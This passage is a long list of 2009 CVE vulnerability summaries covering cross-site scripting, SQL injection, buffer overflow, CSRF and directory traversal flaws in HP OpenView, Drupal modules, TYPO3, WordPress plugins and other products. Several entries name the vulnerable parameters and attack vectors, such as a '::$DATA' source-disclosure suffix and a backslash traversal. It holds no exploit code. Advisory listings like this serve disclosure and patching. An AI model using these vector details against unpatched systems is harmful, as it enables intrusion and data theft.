overflow in ovwebsnmpsrv.exe in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 allows remote attackers to execute arbitrary code via vectors involving the sel and arg parameters to jovgraph.exe. [CVE-2009-4178] Heap-based buffer overflow in OvWebHelp.exe in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 allows remote attackers to execute arbitrary code via a long Topic parameter. [CVE-2009-4177] Buffer overflow in webappmon.exe in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 allows remote attackers to execute arbitrary code via a long HTTP Host header. [CVE-2009-4172] Cross-site scripting (XSS) vulnerability in index.php in CutePHP CuteNews 1.4.6 and UTF-8 CuteNews 8 and 8b, when magic_quotes_gpc is disabled, allows remote attackers to inject arbitrary web script or HTML via the body of a news article in an addnews action. [CVE-2009-4169] Cross-site scripting (XSS) vulnerability in wp-cumulus.php in the WP-Cumulus Plug-in before 1.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4168] Cross-site scripting (XSS) vulnerability in Roy Tanck tagcloud.swf, as used in the WP-Cumulus plugin before 1.23 for WordPress and the Joomulus module 2.0 and earlier for Joomla!, allows remote attackers to inject arbitrary web script or HTML via the tagcloud parameter in a tags action. Cross-site scripting (XSS) vulnerability in tagcloud.swf in the WP-Cumulus Plug-in before 1.23 for WordPress allows remote attackers to inject arbitrary web script or HTML via the tagcloud parameter. [CVE-2009-4164] Cross-site scripting (XSS) vulnerability in the simple Glossar (simple_glossar) extension 1.0.3 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4161] Cross-site scripting (XSS) vulnerability in the [AN] Search it! (an_searchit) extension 2.4.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4159] Cross-site scripting (XSS) vulnerability in the newsletter configuration feature in the backend module in the Direct Mail (direct_mail) extension 2.6.4 and earlier for TYPO3 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4157] Multiple cross-site scripting (XSS) vulnerabilities in index.php in the ProofReader (com_proofreader) component 1.0 RC9 and earlier for Joomla! allow remote attackers to inject arbitrary web script or HTML via the URI, which is not properly handled in (1) 404 or (2) error pages. [CVE-2009-4153] Unspecified vulnerability in the XMLAccess component in IBM WebSphere Portal 6.1.x before 6.1.0.3 has unknown impact and attack vectors, related to the work directory. [CVE-2009-4152] Cross-site scripting (XSS) vulnerability in the Collaboration component in IBM WebSphere Portal 6.1.x before 6.1.0.3 allows remote attackers to inject arbitrary web script or HTML via the people picker tag. [CVE-2009-4151] Session fixation vulnerability in html/Elements/SetupSessionCookie in Best Practical Solutions RT 3.0.0 through 3.6.9 and 3.8.x through 3.8.5 allows remote attackers to hijack web sessions by setting the session identifier via a manipulation that leverages "HTTP access to the RT server," a related issue to CVE-2009-3585. [CVE-2009-4129] Race condition in Mozilla Firefox allows remote attackers to produce a JavaScript message with a spoofed domain association by writing the message in between the document request and document load for a web page in a different domain. [CVE-2009-4121] Multiple cross-site request forgery (CSRF) vulnerabilities in Quick.CMS 2.4 and Quick.CMS.Lite 2.4 allow remote attackers to hijack the authentication of the administrator for requests that (1) delete web pages via a p-delete action to admin.php, and possibly (2) delete products or (3) delete orders via unspecified vectors. NOTE: some of these details are obtained from third party information. [CVE-2009-4119] Cross-site scripting (XSS) vulnerability in Feed Element Mapper module 5.x before 5.x-1.3, 6.x before 6.x-1.3, and 6.x-2.0-alpha before 6.x-2.0-alpha4 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4110] Cross-site scripting (XSS) vulnerability in the search functionality in DotNetNuke 4.8 through 5.1.4 allows remote attackers to inject arbitrary web script or HTML via search terms that are not properly filtered before display in a custom results page. [CVE-2009-4096] RADIO istek scripti 2.5 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain user credentials via a direct request for estafresgaftesantusyan.inc. [CVE-2009-4093] Multiple cross-site scripting (XSS) vulnerabilities in comments.php in Simplog 0.9.3.2, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) cname (Name) or (2) email parameters. [CVE-2009-4087] Cross-site scripting (XSS) vulnerability in index.php in telepark.wiki 2.4.23 and earlier allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. [CVE-2009-4083] Multiple cross-site scripting (XSS) vulnerabilities in e107 0.7.16 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors in (1) submitnews.php, (2) usersettings.php [CVE-2009-4078] Multiple cross-site scripting (XSS) vulnerabilities in Redmine 0.8.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4077] Cross-site request forgery (CSRF) vulnerability in Roundcube Webmail 0.2.2 and earlier allows remote attackers to hijack the authentication of unspecified users for requests that send arbitrary emails via unspecified vectors, a different vulnerability than CVE-2009-4076. [CVE-2009-4076] Cross-site request forgery (CSRF) vulnerability in Roundcube Webmail 0.2.2 and earlier allows remote attackers to hijack the authentication of unspecified users for requests that modify user information via unspecified vectors, a different vulnerability than CVE-2009-4077. [CVE-2009-4074] The XSS Filter in Microsoft Internet Explorer 8 allows remote attackers to leverage the "response-changing mechanism" to conduct cross-site scripting (XSS) attacks against web sites that have no inherent XSS vulnerabilities, related to the details of output encoding and improper modification of an HTML attribute, aka "XSS Filter Script Handling Vulnerability." [CVE-2009-4073] The printing functionality in Microsoft Internet Explorer 8 allows remote attackers to discover a local pathname, and possibly a local username, by reading the dc:title element of a PDF document that was generated from a local web page. [CVE-2009-4071] Opera before 10.10, when exception stacktraces are enabled, places scripting error messages from a web site into variables that can be read by a different web site, which allows remote attackers to obtain sensitive information or conduct cross-site scripting (XSS) attacks via unspecified vectors. [CVE-2009-4069] Multiple cross-site scripting (XSS) vulnerabilities in GForge 4.5.14, 4.7.3, and possibly other versions allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4065] Cross-site scripting (XSS) vulnerability in the settings page in the Strongarm module 6.x before 6.x-1.1 for Drupal allows remote attackers to inject arbitrary web script or HTML via the value field when viewing overridden variables. [CVE-2009-4064] Cross-site scripting (XSS) vulnerability in the Gallery Assist module 6.x before 6.x-1.7 for Drupal allows remote attackers to inject arbitrary web script or HTML via node titles. [CVE-2009-4063] Cross-site scripting (XSS) vulnerability in the Subgroups for Organic Groups (OG) module 5.x before 5.x-4.0 and 5.x before 5.x-3.4 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified node titles. [CVE-2009-4062] Multiple cross-site scripting (XSS) vulnerabilities in the Printfriendly module 6.x before 6.x-1.6 for Drupal allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4061] Multiple cross-site scripting (XSS) vulnerabilities in the Agreement module 6.x before 6.x-1.2 for Drupal allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4052] Multiple cross-site scripting (XSS) vulnerabilities in the JSF Widget Library Runtime in IBM Rational Application Developer for WebSphere Software before 7.0.0.10 and Rational Software Architect before 7.0.0.10 allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) the JSF Tree Control and (2) the JavaScript Resource Servlet. [CVE-2009-4047] Multiple cross-site scripting (XSS) vulnerabilities in PHD Help Desk 1.43 allow remote attackers to inject arbitrary web script or HTML via (1) the PATH_INFO to area.php [CVE-2009-4044] The Web Services module 6.x for Drupal does not perform the expected access control, which allows remote attackers to make unspecified use of an API via unknown vectors. [CVE-2009-4043] Cross-site scripting (XSS) vulnerability in the AddToAny module 5.x before 5.x-2.4 and 6.x before 6.x-2.4 for Drupal allows remote attackers to inject arbitrary web script or HTML via a node title. [CVE-2009-4042] Cross-site scripting (XSS) vulnerability in the RootCandy theme 6.x before 6.x-1.5 for Drupal allows remote attackers to inject arbitrary web script or HTML via the URI. [CVE-2009-4040] Cross-site scripting (XSS) vulnerability in phpMyFAQ before 2.0.17 and 2.5.x before 2.5.2, when used with Internet Explorer 6 or 7, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters to the search page. [CVE-2009-4039] Cross-site scripting (XSS) vulnerability in Piwigo before 2.0.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4038] Multiple cross-site scripting (XSS) vulnerabilities in NCH Software Axon Virtual PBX 2.10 and 2.11 allow remote attackers to inject arbitrary web script or HTML via the (1) onok or (2) oncancel parameter to the logon program. NOTE: the provenance of this information is unknown [CVE-2009-4032] Multiple cross-site scripting (XSS) vulnerabilities in Cacti 0.8.7e allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) graph.php, (2) include/top_graph_header.php, (3) lib/html_form.php, and (4) lib/timespan_settings.php, as demonstrated by the (a) graph_end or (b) graph_start parameters to graph.php [CVE-2009-3985] Mozilla Firefox before 3.0.16 and 3.5.x before 3.5.6, and SeaMonkey before 2.0.1, allows remote attackers to associate spoofed content with an invalid URL by setting document.location to this URL, and then writing arbitrary web script or HTML to the associated blank document, a related issue to CVE-2009-2654. [CVE-2009-3970] SQL injection vulnerability in index.php in PHP Dir Submit (aka WebsiteSubmitter or Submitter Script) allows remote authenticated users to execute arbitrary SQL commands via the aid parameter in a showarticle action. [CVE-2009-3962] The management interface on the 2wire Gateway 1700HG, 1701HG, 1800HW, 2071, 2700HG, and 2701HG-T with software before 5.29.52 allows remote attackers to cause a denial of service (reboot) via a %0d%0a sequence in the page parameter to the xslt program on TCP port 50001, a related issue to CVE-2006-4523. [CVE-2009-3950] Multiple cross-site scripting (XSS) vulnerabilities in Bractus SunTrack allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to newprofile.html [CVE-2009-3934] The WebFrameLoaderClient::dispatchDidChangeLocationWithinPage function in src/webkit/glue/webframeloaderclient_impl.cc in Google Chrome before 3.0.195.32 allows user-assisted remote attackers to cause a denial of service via a page-local link, related to an "empty redirect chain," as demonstrated by a message in Yahoo! Mail. [CVE-2009-3933] WebKit before r50173, as used in Google Chrome before 3.0.195.32, allows remote attackers to cause a denial of service (CPU consumption) via a web page that calls the JavaScript setInterval method, which triggers an incompatibility between the WTF::currentTime and base::Time functions. [CVE-2009-3923] The VirtualBox 2.0.8 and 2.0.10 web service in Sun Virtual Desktop Infrastructure (VDI) 3.0 does not require authentication, which allows remote attackers to obtain unspecified access via vectors involving requests to an Apache HTTP Server. [CVE-2009-3919] Cross-site scripting (XSS) vulnerability in the NGP COO/CWP Integration (crmngp) module 6.x before 6.x-1.12 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified "user-supplied information." [CVE-2009-3918] Cross-site scripting (XSS) vulnerability in the Zoomify module 5.x before 5.x-2.2 and 6.x before 6.x-1.4, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via the node title. [CVE-2009-3917] Cross-site scripting (XSS) vulnerability in the S5 Presentation Player module 6.x-1.x before 6.x-1.1 for Drupal allows remote attackers to inject arbitrary web script or HTML via an unspecified field that is copied to the HTML HEAD element. [CVE-2009-3916] Cross-site scripting (XSS) vulnerability in the Node Hierarchy module 5.x before 5.x-1.3 and 6.x before 6.x-1.3, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via a child node title. [CVE-2009-3915] Cross-site scripting (XSS) vulnerability in the "Separate title and URL" formatter in the Link module 5.x before 5.x-2.6 and 6.x before 6.x-2.7, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via the link title field. [CVE-2009-3914] Cross-site scripting (XSS) vulnerability in the Temporary Invitation module 5.x before 5.x-2.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via the Name field in an invitation. [CVE-2009-3913] SQL injection vulnerability in summary.php in Xerox Fiery Webtools allows remote attackers to execute arbitrary SQL commands via the select parameter. [CVE-2009-3911] Cross-site scripting (XSS) vulnerability in settings.php in TFTgallery 0.13 allows remote attackers to inject arbitrary web script or HTML via the sample parameter. [CVE-2009-3905] Multiple cross-site scripting (XSS) vulnerabilities in e-Courier CMS allow remote attackers to inject arbitrary web script or HTML via the UserGUID parameter to (1) Wizard_tracking.asp, (2) wizard_oe2.asp, (3) your-register.asp, (4) main-whyregister.asp, and (5) your.asp in home/, and other unspecified vectors. NOTE: the provenance of this information is unknown [CVE-2009-3903] Multiple cross-site scripting (XSS) vulnerabilities in jspui/index.jsp in ManageEngine Netflow Analyzer 7.5 build 7500 allow remote attackers to inject arbitrary web script or HTML via the (1) view and (2) section parameters. NOTE: the provenance of this information is unknown [CVE-2009-3902] Directory traversal vulnerability in Cherokee Web Server 0.5.4 and earlier for Windows allows remote attackers to read arbitrary files via a /\.. (slash backslash dot dot) in the URL. [CVE-2009-3901] Multiple cross-site scripting (XSS) vulnerabilities in e-Courier CMS allow remote attackers to inject arbitrary web script or HTML via the UserGUID parameter to home/index.asp and other unspecified vectors. [CVE-2009-3898] Directory traversal vulnerability in src/http/modules/ngx_http_dav_module.c in nginx (aka Engine X) before 0.7.63, and 0.8.x before 0.8.17, allows remote authenticated users to create or overwrite arbitrary files via a .. (dot dot) in the Destination HTTP header for the WebDAV (1) COPY or (2) MOVE method. [CVE-2009-3892] Cross-site scripting (XSS) vulnerability in Best Practical Solutions RT 3.6.x before 3.6.9, 3.8.x before 3.8.5, and other 3.4.6 through 3.8.4 versions allows remote attackers to inject arbitrary web script or HTML via certain Custom Fields. [CVE-2009-3891] Cross-site scripting (XSS) vulnerability in wp-admin/press-this.php in WordPress before 2.8.6 allows remote authenticated users to inject arbitrary web script or HTML via the s parameter (aka the selection variable). [CVE-2009-3886] The Java Web Start implementation in Sun Java SE 6 before Update 17 does not properly handle the interaction between a signed JAR file and a JNLP (1) application or (2) applet, which has unspecified impact and attack vectors, related to a "regression," aka Bug Id 6870531. [CVE-2009-3878] Buffer overflow in Sun Java System Web Server 7.0 Update 6 has unspecified impact and remote attack vectors, as demonstrated by the vd_sjws module in VulnDisco Pack Professional 8.12. NOTE: as of 20091105, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2009-3866] The Java Web Start Installer in Sun Java SE in JDK and JRE 6 before Update 17 does not properly use security model permissions when removing installer extensions, which allows remote attackers to execute arbitrary code by modifying a certain JNLP file to have a URL field that points to an unintended trusted application, aka Bug Id 6872824. [CVE-2009-3865] The launch method in the Deployment Toolkit plugin in Java Runtime Environment (JRE) in Sun Java SE in JDK and JRE 6 before Update 17 allows remote attackers to execute arbitrary commands via a crafted web page, aka Bug Id 6869752. [CVE-2009-3858] Cross-site scripting (XSS) vulnerability in GejoSoft allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to the default URI in photos/tags. [CVE-2009-3856] Cross-site scripting (XSS) vulnerability in the default URI in news/ in Twilight CMS before 4.1 allows remote attackers to inject arbitrary web script or HTML via the calendar parameter. NOTE: some of these details are obtained from third party information. [CVE-2009-3833] Cross-site scripting (XSS) vulnerability in index.php in TFTgallery 0.13 allows remote attackers to inject arbitrary web script or HTML via the album parameter. [CVE-2009-3822] PHP remote file inclusion vulnerability in Fiji Web Design Ajax Chat (com_ajaxchat) component 1.0 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[mosConfig_absolute_path] parameter to tests/ajcuser.php. [CVE-2009-3821] Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-3816] Multiple cross-site scripting (XSS) vulnerabilities in Activities pages in the Mobile subsystem in IBM Lotus Connections 2.5.0.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-3803] Multiple cross-site scripting (XSS) vulnerabilities in Amiro.CMS 5.4.0.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the status_message parameter to (1) /news, (2) /comment, (3) /forum, (4) /blog, and (5) /tags [CVE-2009-3789] Multiple cross-site scripting (XSS) vulnerabilities in OpenDocMan 1.2.5 allow remote attackers to inject arbitrary web script or HTML via the last_message parameter to (1) add.php, (2) toBePublished.php, (3) index.php, and (4) admin.php [CVE-2009-3786] Cross-site scripting (XSS) vulnerability in Organic Groups (OG) Vocabulary 5.x before 5.x-1.1 and 6.x before 6.x-1.1, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via the group title. [CVE-2009-3784] Open redirect vulnerability in Simplenews Statistics 6.x before 6.x-2.0, a module for Drupal, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. [CVE-2009-3783] Cross-site scripting (XSS) vulnerability in Simplenews Statistics 6.x before 6.x-2.0, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via unspecified vector. [CVE-2009-3780] Cross-site scripting (XSS) vulnerability in Abuse 5.x before 5.x-2.1 and 6.x before 6.x-1.1-alpha1, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-3779] Cross-site scripting (XSS) vulnerability in vCard 5.x before 5.x-1.4 and 6.x before 6.x-1.3, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to the addition of the theme_vcard function to a theme and the use of default content. [CVE-2009-3760] Static code injection vulnerability in config/writeconfig.php in the sample code in the XenServer Resource Kit in Citrix XenCenterWeb allows remote attackers to inject arbitrary PHP code into include/config.ini.php via the pool1 parameter. NOTE: some of these details are obtained from third party information. [CVE-2009-3759] Multiple cross-site request forgery (CSRF) vulnerabilities in sample code in the XenServer Resource Kit in Citrix XenCenterWeb allow remote attackers to hijack the authentication of administrators for (1) requests that change the password via the username parameter to config/changepw.php or (2) stop a virtual machine via the stop_vmname parameter to hardstopvm.php. NOTE: some of these details are obtained from third party information. [CVE-2009-3758] SQL injection vulnerability in login.php in sample code in the XenServer Resource Kit in Citrix XenCenterWeb allows remote attackers to execute arbitrary SQL commands via the username parameter. NOTE: some of these details are obtained from third party information. [CVE-2009-3757] Multiple cross-site scripting (XSS) vulnerabilities in sample code in the XenServer Resource Kit in Citrix XenCenterWeb allow remote attackers to inject arbitrary web script or HTML via the (1) username parameter to config/edituser.php [CVE-2009-3755] Multiple cross-site scripting (XSS) vulnerabilities in phpBMS 0.96 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) index.php and (2) modules\base\myaccount.php [CVE-2009-3751] Cross-site scripting (XSS) vulnerability in home.php in Opial 1.0 allows remote attackers to inject arbitrary web script or HTML via the genres_parent parameter. [CVE-2009-3749] The Web Administrator service (STEMWADM.EXE) in Websense Personal Email Manager 7.1 before Hotfix 4 and Email Security 7.1 before Hotfix 4 allows remote attackers to cause a denial of service (crash) by sending a HTTP GET request to TCP port 8181 and closing the socket before the service can send a response. [CVE-2009-3748] Multiple cross-site scripting (XSS) vulnerabilities in the Web Administrator in Websense Personal Email Manager 7.1 before Hotfix 4 and Email Security 7.1 before Hotfix 4 allow remote attackers to inject arbitrary web script or HTML via the (1) FileName, (2) IsolatedMessageID, (3) ServerName, (4) Dictionary, (5) Scoring, and (6) MessagePart parameters to web/msgList/viewmsg/actions/msgAnalyse.asp [CVE-2009-3747] Cross-site scripting (XSS) vulnerability in index.php in TBmnetCMS 1.0 allows remote attackers to inject arbitrary web script or HTML via the content parameter. NOTE: this was originally reported for tbmnet.php, but that program does not exist in the TBmnetCMS 1.0 distribution. [CVE-2009-3745] Cross-site scripting (XSS) vulnerability in the help pages in IBM Rational AppScan Enterprise Edition 5.5.0.2 allows remote attackers to inject arbitrary web script or HTML via the query string. [CVE-2009-3742] Cross-site scripting (XSS) vulnerability in Liferay Portal before 5.3.0 allows remote attackers to inject arbitrary web script or HTML via the p_p_id parameter. [CVE-2009-3731] Multiple cross-site scripting (XSS) vulnerabilities in WebWorks Help 2.0 through 5.0 in VMware vCenter 4.0 before Update 1 Build 208156 [CVE-2009-3730] Multiple cross-site scripting (XSS) vulnerabilities in the ReqWeb Help feature (aka the Web Client Help system) in IBM Rational RequisitePro 7.1.0 allow remote attackers to inject arbitrary web script or HTML via (1) the operation parameter to ReqWebHelp/advanced/workingSet.jsp, or the (2) searchWord, (3) maxHits, (4) scopedSearch, or (5) scope parameter to ReqWebHelp/basic/searchView.jsp. [CVE-2009-3719] Cross-site scripting (XSS) vulnerability in comment.asp in Battle Blog 1.25 and 1.30 build 2 allows remote attackers to inject arbitrary web script or HTML via a comment. [CVE-2009-3714] Cross-site scripting (XSS) vulnerability in admin_login.php in MCshoutbox 1.1 allows remote attackers to inject arbitrary web script or HTML via the loginerror parameter. [CVE-2009-3697] SQL injection vulnerability in the PDF schema generator functionality in phpMyAdmin 2.11.x before 2.11.9.6 and 3.x before 3.2.2.1 allows remote attackers to execute arbitrary SQL commands via unspecified interface parameters. [CVE-2009-3696] Cross-site scripting (XSS) vulnerability in phpMyAdmin 2.11.x before 2.11.9.6 and 3.x before 3.2.2.1 allows remote attackers to inject arbitrary web script or HTML via a crafted name for a MySQL table. [CVE-2009-3668] Cross-site scripting (XSS) vulnerability in ardguest.php in Ardguest 1.8 allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2009-3666] Cross-site scripting (XSS) vulnerability in index.php in Nullam Blog 0.1.2 allows remote attackers to inject arbitrary web script or HTML via the e parameter in an error action. [CVE-2009-3663] Format string vulnerability in the h_readrequest function in http.c in httpdx Web Server 1.4 allows remote attackers to cause a denial of service (crash) or execute arbitrary code via format string specifiers in the Host header. [CVE-2009-3657] Session fixation vulnerability in Shared Sign-On 5.x and 6.x, a module for Drupal, allows remote attackers to hijack web sessions via unspecified vectors. [CVE-2009-3654] Unspecified vulnerability in Boost before 6.x-1.03, a module for Drupal, allows remote attackers to create new webroot directories via unknown attack vectors. [CVE-2009-3652] Cross-site scripting (XSS) vulnerability in Organic Groups (OG) 5.x-7.x before 5.x-7.4, 5.x-8.x before 5.x-8.1, and 6.x-1.x before 6.x-1.4, a module for Drupal, allows remote authenticated users, with create or edit group nodes permissions, to inject arbitrary web script or HTML via the User-Agent HTTP header, a different issue than CVE-2008-3095. [CVE-2009-3651] Cross-site scripting (XSS) vulnerability in the "Monitor browsers' feature in Browscap before 5.x-1.1 and 6.x-1.1, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via the User-Agent HTTP header. [CVE-2009-3650] Cross-site scripting (XSS) vulnerability in Dex 5.x-1.0 and earlier and 6.x-1.0-rc1 and earlier, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-3649] Cross-site scripting (XSS) vulnerability in forums/index.php in Power Bulletin Board (PBBoard) 2.0.2 and possibly earlier allows remote attackers to inject arbitrary web script or HTML via the id parameter in a new_topic action. [CVE-2009-3648] Cross-site scripting (XSS) vulnerability in Service Links 6.x-1.0, a module for Drupal, allows remote authenticated users, with 'administer content types' permissions, to inject arbitrary web script or HTML via unspecified vectors when displaying content type names. [CVE-2009-3647] Cross-site scripting (XSS) vulnerability in emaullinks.php in YABSoft Mega File Hosting Script (aka MFH or MFHS) 1.2 allows remote attackers to inject arbitrary web script or HTML via the moudi parameter. NOTE: the provenance of this information is unknown [CVE-2009-3646] InterVations NaviCOPA Web Server 3.01 allows remote attackers to obtain the source code for a web page via an HTTP request with the addition of ::$DATA after the HTML file name. [CVE-2009-3636] Cross-site scripting (XSS) vulnerability in the Install Tool subcomponent in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. [CVE-2009-3634] Cross-site scripting (XSS) vulnerability in the Frontend Login Box (aka felogin) subcomponent in TYPO3 4.2.0 through 4.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. [CVE-2009-3633] Cross-site scripting (XSS) vulnerability in the t3lib_div::quoteJSvalue API function in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the sanitizing algorithm. [CVE-2009-3630] The Backend subcomponent in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allows remote authenticated users to place arbitrary web sites in TYPO3 backend framesets via crafted parameters, related to a "frame hijacking" issue. [CVE-2009-3629] Multiple cross-site scripting (XSS) vulnerabilities in the Backend subcomponent in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-3618] Cross-site scripting (XSS) vulnerability in viewvc.py in ViewVC 1.0 before 1.0.9 and 1.1 before 1.1.2 allows remote attackers to inject arbitrary web script or HTML via the view parameter. NOTE: some of these details are obtained from third party information. [CVE-2009-3601] Cross-site scripting (XSS) vulnerability in demo_page.php in Scriptsez Ultimate Poll allows remote attackers to inject arbitrary web script or HTML via the clr parameter in a vote action. [CVE-2009-3599] Cross-site scripting (XSS) vulnerability in single_winner1.php in HUBScript 1.0 allows remote attackers to inject arbitrary web script or HTML via the bid_id parameter. [CVE-2009-3598] Cross-site scripting (XSS) vulnerability in survey_result.php in eCardMAX FormXP 2007 allows remote attackers to inject arbitrary web script or HTML via the sid parameter. [CVE-2009-3597] Digitaldesign CMS 0.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for autoconfig.dd. [CVE-2009-3594] Cross-site scripting (XSS) vulnerability in bpost.php in BLOB Blog System before 1.2 allows remote attackers to inject arbitrary web script or HTML via the postid parameter. [CVE-2009-3593] Multiple cross-site scripting (XSS) vulnerabilities in Freelancers 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to placebid.php and (2) jobid parameter to post_resume.php. [CVE-2009-3592] Cross-site scripting (XSS) vulnerability in customer/home.php in Qualiteam X-Cart allows remote attackers to inject arbitrary web script or HTML via the email parameter in a subscribed action, a different vector than CVE-2005-1823. [CVE-2009-3585] Session fixation vulnerability in html/Elements/SetupSessionCookie in Best Practical Solutions RT 3.0.0 through 3.6.9 and 3.8.x through 3.8.5 allows remote attackers to hijack web sessions by setting the session identifier via a manipulation that leverages a second web server within the same domain. [CVE-2009-3581] Multiple cross-site scripting (XSS) vulnerabilities in SQL-Ledger 2.8.24 allow remote authenticated users to inject arbitrary web script or HTML via (1) the DCN Description field in the Accounts Receivables menu item for Add Transaction, (2) the Description field in the Accounts Payable menu item for Add Transaction, or the name field in (3) the Customers menu item for Add Customer or (4) the Vendor menu item for Add Vendor. [CVE-2009-3579] Cross-site scripting (XSS) vulnerability in the CookieDump.java sample application in Mort Bay Jetty 6.1.19 and 6.1.20 allows remote attackers to inject arbitrary web script or HTML via the Value parameter in a GET request to cookie/. [CVE-2009-3567] Cross-site scripting (XSS) vulnerability in modules/tickets/functions_ticketsui.php in Kayako SupportSuite and eSupport 3.60.04 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in the staff control panel, a different vector than CVE-2007-1145. [CVE-2009-3565] Multiple cross-site scripting (XSS) vulnerabilities in intruvert/jsp/module/Login.jsp in McAfee IntruShield Network Security Manager (NSM) before 5.1.11.6 allow remote attackers to inject arbitrary web script or HTML via the (1) iaction or (2) node parameter. [CVE-2009-3562] Cross-site scripting (XSS) vulnerability in Xerver HTTP Server 4.32 allows remote attackers to inject arbitrary web script or HTML via the currentPath parameter in a chooseDirectory action. [CVE-2009-3553] Use-after-free vulnerability in the abstract file-descriptor handling interface in the cupsdDoSelect function in scheduler/select.c in the scheduler in cupsd in CUPS 1.3.7 and 1.3.10 allows remote attackers to cause a denial of service (daemon crash or hang) via a client disconnection during listing of a large number of print jobs, related to improperly maintaining a reference count. NOTE: some of these details are obtained from third party information. [CVE-2009-3544] Xerver HTTP Server 4.32 allows remote attackers to obtain the source code for a web page via an HTTP request with the addition of ::$DATA after the HTML file name. [CVE-2009-3540] Cross-site scripting (XSS) vulnerability in listads.php in YourFreeWorld Ultra Classifieds Pro allows remote attackers to inject arbitrary web script or HTML via the cn parameter. NOTE: the provenance of this information is unknown [CVE-2009-3539] Multiple cross-site scripting (XSS) vulnerabilities in YourFreeWorld Ultra Classifieds Pro allow remote attackers to inject arbitrary web script or HTML via the (1) cname parameter to subclass.php and the (2) sn parameter to listads.php. [CVE-2009-3530] Cross-site scripting (XSS) vulnerability in storefront.php in RadScripts RadBids Gold 4 allows remote attackers to inject arbitrary web script or HTML via the mode parameter. [CVE-2009-3521] Multiple cross-site scripting (XSS) vulnerabilities in the Visualization Engine (VE) in IBM Tivoli Composite Application Manager for WebSphere (ITCAM) 6.1.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-3513] Multiple cross-site scripting (XSS) vulnerabilities in Pilot Group (PG) eTraining allow remote attackers to inject arbitrary web script or HTML via (1) the cat_id parameter to courses_login.php, the id parameter to (2) news_read.php or (3) lessons_login.php, or (4) the cur parameter in a start action to lessons_login.php. [CVE-2009-3512] Multiple cross-site scripting (XSS) vulnerabilities in MyWeight 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) date parameter to user_addfood.php, info parameter to (2) user_forgot_pwd_form.php and (3) user_login.php, and (4) return parameter to user_login.php. [CVE-2009-3509] Cross-site scripting (XSS) vulnerability in admin/admin_index.php in CJ Dynamic Poll PRO 2.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. [CVE-2009-3506] Multiple cross-site scripting (XSS) vulnerabilities in CMSphp 0.21 allow remote attackers to inject arbitrary web script or HTML via the (1) cook_user parameter to index.php and the (2) name parameter to modules.php. [CVE-2009-3496] Cross-site scripting (XSS) vulnerability in view_mag.php in Vastal I-Tech DVD Zone allows remote attackers to inject arbitrary web script or HTML via the mag_id parameter. [CVE-2009-3493] Multiple cross-site scripting (XSS) vulnerabilities in Zenas PaoBacheca Guestbook 2.1 allow remote attackers to inject arbitrary web script or HTML via 